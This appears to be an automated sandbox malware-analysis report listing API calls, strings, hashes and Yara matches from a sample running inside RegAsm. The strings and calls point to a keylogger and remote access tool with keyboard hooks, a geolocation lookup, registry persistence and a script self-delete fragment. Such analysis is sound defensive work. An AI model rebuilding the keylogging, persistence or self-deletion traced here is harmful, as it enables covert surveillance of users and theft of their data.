                                                                                                                                                                                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                                          • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                                                                                                                                          • ToUnicodeEx.USER32(00475144,0000005B,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                                                                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                                                                                                          • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1888522110-0
                                                                                                                                                                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                          • API String ID: 3121278467-91888290
                                                                                                                                                                                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                                          • String ID: xpF
                                                                                                                                                                                          • API String ID: 1852769593-354647465
                                                                                                                                                                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                          • API String ID: 782494840-2070987746
                                                                                                                                                                                          • Opcode ID: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                                                                                                                                          • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                            • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1840779552.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1839943215.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1840779552.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_10000000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                          • String ID: XQG
                                                                                                                                                                                          • API String ID: 1958988193-3606453820
                                                                                                                                                                                          • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1840779552.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1839943215.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1840779552.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_10000000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1840779552.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1839943215.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1840779552.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_10000000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountEventTick
                                                                                                                                                                                          • String ID: !D@$NG
                                                                                                                                                                                          • API String ID: 180926312-2721294649
                                                                                                                                                                                          • Opcode ID: 78a52cc46aaeb9b6fa5ebcf721800ade9b9598b0b78790c945f0e5eb798a5b71
                                                                                                                                                                                          • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                                                                          • Opcode Fuzzy Hash: 78a52cc46aaeb9b6fa5ebcf721800ade9b9598b0b78790c945f0e5eb798a5b71
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                          • String ID: Offline Keylogger Started
                                                                                                                                                                                          • API String ID: 465354869-4114347211
                                                                                                                                                                                          • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                          • API String ID: 2532271599-1507639952
                                                                                                                                                                                          • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                                                                          • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                          • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                                                                                                                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 3123878439-4028850238
                                                                                                                                                                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3360349984-0
                                                                                                                                                                                          • Opcode ID: b1d94ccb09ae88335c98018fba1659fd9f6643181a77e83682c5dcad394a06c0
                                                                                                                                                                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1d94ccb09ae88335c98018fba1659fd9f6643181a77e83682c5dcad394a06c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 188215759-0
                                                                                                                                                                                          • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                                          • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
